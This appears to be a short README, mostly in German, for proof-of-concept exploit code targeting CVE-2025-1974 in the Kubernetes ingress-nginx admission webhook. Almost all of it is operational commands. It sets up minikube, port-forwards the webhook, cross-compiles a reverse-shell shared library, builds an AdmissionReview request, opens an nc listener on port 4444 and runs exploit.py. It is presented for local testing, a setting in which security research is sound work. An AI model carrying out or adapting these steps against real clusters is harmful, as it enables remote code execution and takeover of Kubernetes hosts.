
CVE-2025-1974 PoC-Code
Installiere minikube für lokale Tests
minikube start --driver=docker
Konfiguriere den ingress-nginx-controller mit dem folgenden Befehl:
kubectl apply -f ingress-nginx-controller.yml
Überprüfen, ob die Pods ordnungsgemäß funktionieren
kubectl get pods -n ingress-nginx
kubectl describe <pod name> -n ingress-nginx
Leite die Ports 80 und 8443 (Webhook) der Pods auf die lokalen Ports 8888 und 1337 weiter (Port-Weiterleitung für 80 und 8443 erforderlich)
kubectl port-forward -n ingress-nginx <pod name> 8888:80
kubectl port-forward -n ingress-nginx <pod name> 1337:8443
Ändere die IP und den Port für die Reverse Shell in rev_shell.c
Kompiliere unter MacOS (arm64) – je nach Testumgebung anpassen
aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu
Konvertiere mit kube-review in das AdmissionReview-Format (JSON)
./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json
Bereite die Reverse Shell-Verbindung mit nc vor
nc -lv 4444
Passe in exploit.py die Hosts und Ports von nginx und Webhook an und führe es aus
python3 exploit.py
